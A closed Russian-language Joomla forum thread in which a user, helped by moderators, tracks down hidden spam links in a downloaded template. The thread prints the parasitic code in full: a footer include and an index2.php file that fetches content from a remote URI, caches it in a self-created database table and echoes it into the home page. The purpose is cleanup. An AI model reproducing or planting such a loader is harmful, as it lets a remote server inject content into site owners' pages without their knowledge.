Помогите найти спрятанные в шаблоне ссылки на левые сайты

Тема в разделе "Вопросы безопасности", создана пользователем cyber_lord, 24.09.2012.

Статус темы:
Закрыта.
  1. Offline

    cyber_lord Недавно здесь

    Регистрация:
    24.09.2012
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Не могу найти эти ссылки. Искал коммандером, результата ноль! Не подскажите, где они могут быть спрятаны? Код приведен ниже. Первые четыре ссылки только на главной странице, а вот <a href='http://wordpress-joomla.com/'>Шаблоны для Joomla и темы для WordPress - на всех страницах сайта :(

    Код (html):
    1. </div>
    2.  <div class="art-Footer-background">
    3. Удалил.М.
    4. </div>
    5.  
    6.         <div class="cleared"></div>
    7.     </div>
    8. </div>
    9. <div class="cleared"></div>
    10. <div style="visibility:hidden">
    11. <p class='art-page-footer'><a href='Удалил.М.'>Шаблоны для Joomla и темы для WordPress</a></p></div>
    12. </div>
     
    Последнее редактирование модератором: 24.09.2012
  2.  
  3. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 464
    Симпатии:
    305
    Пол:
    Мужской
    1. Не скачивать на шарах шаблоны (могут быть и вирусы)
    2. Открыть папку с шаблоном и просмотреть все файлы на ссылки :) - php
     
    cyber_lord нравится это.
  4. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    Поиск по файлам вставки кода base64_decode
     
  5. Offline

    cyber_lord Недавно здесь

    Регистрация:
    24.09.2012
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Ссылку на шаблоны нашел. Действительно была вставка кода base64_decode. Спасибо.
    Но остальные найти не могу. Они находятся вот в этой части кода:
    Код (html):
    1. <div class="art-Footer-background">
    2.  <br /><br /><br />
    3. <?php
    4. if ($_SERVER[REQUEST_URI]=="/")
    5. {
    6. include($_SERVER['DOCUMENT_ROOT'].$this->baseurl.'/templates/'.$this->template.'/index2.php');
    7. }
    8. ?>
    9.  </div>
    10. </div>
    11.  
    12.         <div class="cleared"></div>
    13.     </div>
    14. </div>


    Вот и index2.php:
    Код (html):
    1. <?php
    2.  
    3. include_once(dirname(__FILE__).'/connect.php');
    4. if(is_resource($link)){
    5.    $checktable = mysql_query('show tables like "'.mysql_escape_string($DB['table']).'"',$link);
    6.    if(is_resource($checktable) && mysql_num_rows($checktable)==1){
    7.        $result = mysql_query('
    8.            select
    9.                `value`
    10.            from
    11.                `'.mysql_escape_string($DB['table']).'`
    12.            where
    13.                `type` = "data"
    14.            limit 1
    15.            ',$link);
    16.        if(is_resource($result) && mysql_num_rows($result)==1){
    17.            $res=mysql_fetch_row($result);
    18.            echo$res[0];
    19.        }
    20.        else{
    21.  
    22.            $result = mysql_query('
    23.                select
    24.                    `date`
    25.                from
    26.                    `'.mysql_escape_string($DB['table']).'`
    27.                where
    28.                    `type` = "error"
    29.                limit 1
    30.                ',$link);
    31.            if(is_resource($result)){
    32.                $flag=false;
    33.                if(mysql_num_rows($result)==1){
    34.  
    35.                    $res = mysql_fetch_row($result);
    36.                    if(time()-strtotime($res[0])>REPEAT_AFTER)
    37.                        $flag=true;
    38.                }
    39.                if($flag || mysql_num_rows($result)==0){
    40.  
    41.                    $data = download(REMOTE_URI);
    42.                    if(is_string($data) && trim($data)!=''){
    43.  
    44.                        mysql_query('truncate table `'.mysql_escape_string($DB['table']).'`',$link);
    45.  
    46.                        mysql_query('
    47.                            insert into
    48.                                `'.mysql_escape_string($DB['table']).'`
    49.                            set
    50.                                `type`="data",
    51.                                `value`="'.mysql_escape_string($data).'",
    52.                                `date`=now()
    53.                            ',$link);
    54.                        echo$data;
    55.                    }
    56.                    else{
    57.  
    58.                        mysql_query('
    59.                            replace
    60.                                `'.mysql_escape_string($DB['table']).'`
    61.                            set
    62.                                `date`=now()
    63.                            where
    64.                                `type`="error",
    65.                                `value`="'.mysql_escape_string('loaderror2').'"
    66.                            limit 1
    67.                            ',$link);
    68.                    }
    69.                }
    70.            }
    71.        }
    72.    }
    73.    else{
    74.  
    75.        mysql_query("
    76.            CREATE TABLE `".mysql_escape_string($DB['table'])."` (
    77.             `type` enum('data','error') collate utf8_unicode_ci NOT NULL default 'data' COMMENT 'тип данных',
    78.             `value` longtext collate utf8_unicode_ci NOT NULL COMMENT 'данные',
    79.             `date` datetime NOT NULL COMMENT 'дата операции',
    80.             PRIMARY KEY  (`type`)
    81.            ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci COMMENT='Таблица подгрузки данных с удалённого сервера'
    82.            ",$link);
    83.        $data = download(REMOTE_URI);
    84.        if(is_string($data) && trim($data)!=''){
    85.  
    86.            mysql_query('truncate table `'.mysql_escape_string($DB['table']).'`',$link);
    87.  
    88.            mysql_query('
    89.                insert into
    90.                    `'.mysql_escape_string($DB['table']).'`
    91.                set
    92.                    `type`="data",
    93.                    `value`="'.mysql_escape_string($data).'",
    94.                    `date`=now()
    95.                ',$link);
    96.            echo$data;
    97.        }
    98.        else{
    99.  
    100.            mysql_query('
    101.                replace
    102.                    `'.mysql_escape_string($DB['table']).'`
    103.                set
    104.                    `type`="error",
    105.                    `value`="'.mysql_escape_string('loaderror1').'",
    106.                    `date`=now()
    107.                ',$link);
    108.        }
    109.    }
    110.    mysql_close($link);
    111. }


    Помогите, пожалуйста.
     
  6. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    Ну и что это за файл ? Для начала переименуй, если все Ок- удалишь.
    И этот левый файл.Ты что тянешь с другого сервера?
     
    cyber_lord нравится это.
  7. Offline

    cyber_lord Недавно здесь

    Регистрация:
    24.09.2012
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Спасибо, исправил! Может, не совсем грамотно, но все-таки.
    Посмотрел файл connect.php. Все эти ссылки тянулись с сервака download(REMOTE_URI). Удалил в index.php левый код и удалил index2.php и connect.php
    Все работает! Спасибо.
     
  8. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    Перенесу я тему в раздел Безопасность.
     
Статус темы:
Закрыта.

Поделиться этой страницей

Загрузка...